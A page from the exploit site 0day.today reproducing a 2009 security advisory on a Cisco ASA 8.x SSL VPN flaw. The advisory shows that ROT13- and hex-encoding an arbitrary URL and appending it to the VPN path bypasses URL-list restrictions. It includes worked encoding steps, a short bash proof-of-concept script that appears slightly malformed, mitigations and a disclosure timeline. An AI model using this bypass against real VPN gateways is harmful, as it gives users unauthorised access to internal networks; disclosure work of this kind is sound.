0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass
================================================================== Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass ================================================================== # Title: Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass # CVE-ID: () # OSVDB-ID: () # Author: David Eduardo Acosta Rodriguez # Published: 2009-12-17 # Verified: no view source print? ============================================= INTERNET SECURITY AUDITORS ALERT 2009-013 - Original release date: December 7th, 2009 - Last revised: December 16th, 2009 - Discovered by: David Eduardo Acosta Rodriguez - Severity: 4/10 (CVSS Base Score) ============================================= I. VULNERABILITY ------------------------- Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass II. BACKGROUND ------------------------- Cisco VPN SSL [1] is a module for Cisco ASA and Cisco Integrated Services Routers to extend network resources to virtually any remote user with access to the Internet and a web browser. III. DESCRIPTION ------------------------- Cisco VPN SSL Clientless lets administrators define rules to specific targets within the private network that WebVPN users will be able to access. This specific targets are published using links in VPN SSL home page. These links (URL) are protected (obfuscated) using a ROT13 substitution[2] and converting ASCII characters to hexadecimal. An user with a valid account and without "URL entry" can access any internal/external resource simply taken an URL, encrypt with ROT 13, convert ASCII characters to hexadecimal and appending this string to Cisco VPN SSL URL. IV. PROOF OF CONCEPT ------------------------- Using URL http://intranet published on internal server (not accessible from home page): 1. Convert string to ROT13: uggc://vagenarg 2. Change ASCII chars to HEX: 756767633a2f2f766167656e617267 3. Append string to Cisco VPN SSL: https://[CISCOVPNSSL]/+CSCO+00756767633a2f2f766167656e617267++ This is a simple PoC for easy demonstration: #!/bin/bash echo -n "write URL:" read a b=`echo -n $a | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m][N-Z][A-M]' | od -tx1 | cut -c8- | sed 's/ //g'` | paste -s -d ''; echo -n "URL " echo -n "https://[CISCOVPNSSL]/+CSCO+00";; echo -n $b; echo -n "++"; echo ""; V. BUSINESS IMPACT ------------------------- Users with valid account can surf to internal/external resources, bypassing controls in home page. VI. SYSTEMS AFFECTED ------------------------- Cisco ASA <= 8.x are vulnerable. VII. SOLUTION ------------------------- Always set "webtype" ACL and "filter" to block access in Web VPN SSL (not activated by default). Included in Cisco site now. Follow recommendations from "Cisco Understanding Features Not Supported in Clientless SSL VPN" [3]. VIII. REFERENCES ------------------------- [1] www.cisco.com/web/go/sslvpn [2] http://en.wikipedia.org/wiki/ROT13 [3] http://www.cisco.com/en/US/docs/security/asa/asa82/configuration/ guide/webvpn.html#wp999589 http://tools.cisco.com/security/center/viewAlert.x?alertId=19609 http://www.isecauditors.com IX. CREDITS ------------------------- This vulnerability has been discovered by David Eduardo Acosta Rodriguez (deacosta (at) isecauditors (dot) com, dacosta (at) computer (dot) org). Thanks to Juan Galiana Lara (jgaliana (at) isecauditors (dot) com)) for additional research. X. REVISION HISTORY ------------------------- December 7, 2009: Initial release. December 16, 2009: Last revision. XI. DISCLOSURE TIMELINE ------------------------- December 9, 2009: Vendor contacted December 9, 2009: Vendor response, they include our mitigation proposal in their website and start the analysis of correction required. December 16, 2009: Vendor confirms remediation and public statement. December 17, 2009: Sent to lists. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information. # 0day.today [2024-12-27] #